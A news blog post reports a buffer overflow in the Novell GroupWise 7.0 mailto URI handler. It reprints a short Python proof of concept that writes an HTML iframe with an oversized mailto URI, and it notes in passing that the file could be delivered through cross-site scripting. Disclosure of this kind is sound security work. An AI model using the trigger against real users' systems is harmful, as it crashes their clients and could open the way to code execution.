Novell GroupWise 'mailto' URI handler buffer overflow vulnerability

Summary:Researcher Juan Pablo Lopez Yacubian has reported another URI abuse exploit.From Security Focus:Novell GroupWise is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Researcher Juan Pablo Lopez Yacubian has reported another URI abuse exploit.

From Security Focus:

Novell GroupWise is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

This issue affects GroupWise 7.0; other versions may also be affected.  

Hmm... When I mentioned URI abuse last week, I said there would be more didn't I?

I'm working on a few myself, this one is pretty nasty since most browsers will accept mailto: URIs without any confirmation, meaning you get cross-site scripted, it forces trigger of a mailto URI and your pwned.  Game over, thanks for playing.

The researcher attached code to Security Focus as a proof of concept, and here's the actual code from that Python file:

#!/usr/bin/python

a = "<iframe src='mailto:" a += "A" * 1530 a += "\x61\x61\x61\x61" a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"

file = open("test.html", "w") file.write(a) file.close()

So, basically, this is a simple python script that will create the exploit code for you, which you would then deploy using cross-site scripting or host on your own page, whatever.  The code does not contain a malicious payload, it's simply proof of concept to cause the crash, so feel free to play with it if you'd like.

On to Juan Pablo, congrats to him.  He's on a roll.  This is the same researcher that earlier this week brought us another Trillian exploit.

-Nate

Topics: Open Source, Collaboration, Enterprise Software, Security, Software

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Related Stories

The best of ZDNet, delivered

You have been successfully signed up. To sign up for more newsletters or to manage your account, visit the Newsletter Subscription Center.
Subscription failed.